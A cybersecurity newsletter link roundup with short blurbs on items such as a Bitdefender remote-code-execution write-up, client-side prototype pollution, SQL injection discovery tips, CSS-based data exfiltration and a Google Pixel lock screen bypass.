Seclog - 2
seclog's spotlight: Client-side prototype pollution, Manual SQL injection discovery tips, I Shared My Phone Number, Hack The WP and katana released!
seclinks
Exploiting Bitdefender Antivirus: RCE from any website | Almost Secure
One thing shouldn’t go unmentioned: security-wise Bitdefender Antivirus is one of the best antivirus products I’ve seen so far, at least in the areas that I looked at.
Cyber-Bookmarks | A list of bookmarks I have used since I started my journey in cyber security
A list of bookmarks
Client-side prototype pollution | Web Security Academy
Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global prototypes, which may then be inherited by user-defined objects.
AutoRegex: Convert from English to RegEx with Natural Language Processing
Regex is difficult to write and comprehend to the average human
with Radare2 play!
An introduction to DevSecOps from a fallen comrade who wishes to remain anonymous.
A dive into Iranian Hacking Groups - Cyberwarzone
The Iranian Ajax Security Team, performed cyberattacks to identify Iranian users which were using anti-censorship technology.
Manual SQL injection discovery tips
According to bugbountyforum.com's AMA format one of the most popular questions is
How do you test for Server Side vulnerabilities such as SQLi?
.
Google Online Security Blog: Our Principles for IoT Security Labeling
IoT product labeling - the definition of labeling, what labeling needs to convey in terms of security and privacy, where the label should reside, and how to achieve consumer acceptance, are still open for debate.
Tell HN: A hacker's life is in danger, your awareness may be life saving
In Iran, he is one of the most famous people active in the field of programming and computer education.
Data exfiltration via CSS properties as
background-image
its possible as you can see in the following linkhttps://github.com/maxchehab/CSS-Keylogging/
.
I Shared My Phone Number. I Learned I Shouldn’t Have. - The New York Times
Our personal tech columnist asked security researchers what they could find out about him from just his cellphone number.
Azure Active Directory – Security Overview | Marius Sandbu
After working with Azure AD for a looong time I always forget how complex it has gotten over the years, with all the new features and capabilities that have been introduced.
First impressions of Bluesky's AT Protocol
A few years ago Twitter's Jack Dorsey announced a project called Bluesky, which was intended to design and build such a system.
Lessons Learned from Cloning Windows Binaries and Code Signing Implants - Hack.Learn.Share
All the lessons I’m sharing here are based on what I learned/observed during my experiment.
A Cypherpunk's Manifesto
service file encyrpt
Hack The WP – all-in-one security extension for wp-cli
Single-command WordPress security!
The Importance of DevSecOps in Blockchain, Decentralized Protocols, and Applications | F5 Blog
Security has always been one of the most important aspects of information technology, and today many organizations and their developers adopt a security-first mindset when building applications.
WTFPL – Do What the Fuck You Want to Public License
The WTFPL is a very permissive license for software and other scientific or artistic works that offers a great degree of freedom. In fact, it is probably the best license out there.
KICS - Keeping Infrastructure as Code Secure
keeping infrastructure as code secure is an open source solution for static code analysis of Infrastructure as Code.
2022 Conference Roundup - Google Next, Microsoft Ignite and Oracle Cloud World - Chris Farris
2022 Conference Roundup
4 books every cybersecurity startup founder needs to read (and 15 more that can be helpful)
I believe there are only a few books that everyone starting a cybersecurity startup should read; the rest will depend on their unique areas of focus and areas of weaknesses, and the company they are building.
Accidental $70k Google Pixel Lock Screen Bypass - bugs.xdavidhu.me
The issue allowed an attacker with physical access to bypass the lock screen protections (fingerprint, PIN, etc.) and gain complete access to the user’s device.